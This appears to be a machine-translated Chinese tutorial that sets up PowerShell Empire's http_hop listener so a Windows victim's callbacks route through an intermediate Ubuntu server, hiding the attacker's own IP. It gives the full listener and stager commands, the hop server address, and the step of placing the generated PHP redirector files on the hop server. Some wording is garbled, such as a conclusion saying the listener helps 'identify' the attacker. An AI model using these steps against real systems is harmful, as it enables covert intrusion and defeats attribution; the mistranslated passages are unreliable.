使用PowerShell Empire(http_hop)隐藏IP

在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。

与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。

在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。

使用PowerShell Empire(http_hop)隐藏IP

在下图中,您也可以看到我们的ubuntu的IP

使用PowerShell Empire(http_hop)隐藏IP

现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:

uselistener http

execute

使用PowerShell Empire(http_hop)隐藏IP

现在,输入以下命令启动http_hop侦听器:

uselistener http_hop

set RedirectListener http

set Host //192.168.1.111

在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。

使用PowerShell Empire(http_hop)隐藏IP

执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:

使用PowerShell Empire(http_hop)隐藏IP

现在,您可以在下图中看到我们激活了两个侦听器:

使用PowerShell Empire(http_hop)隐藏IP

让我们通过键入以下命令来启动stager

usestager windows/launcher_bat

set Listener http_hop

execute

使用PowerShell Empire(http_hop)隐藏IP

在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。

使用PowerShell Empire(http_hop)隐藏IP

总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。

使用PowerShell Empire(http_hop)隐藏IP

上一篇:JS函数防抖和节流


下一篇:范围选择器,jquery.range插件使用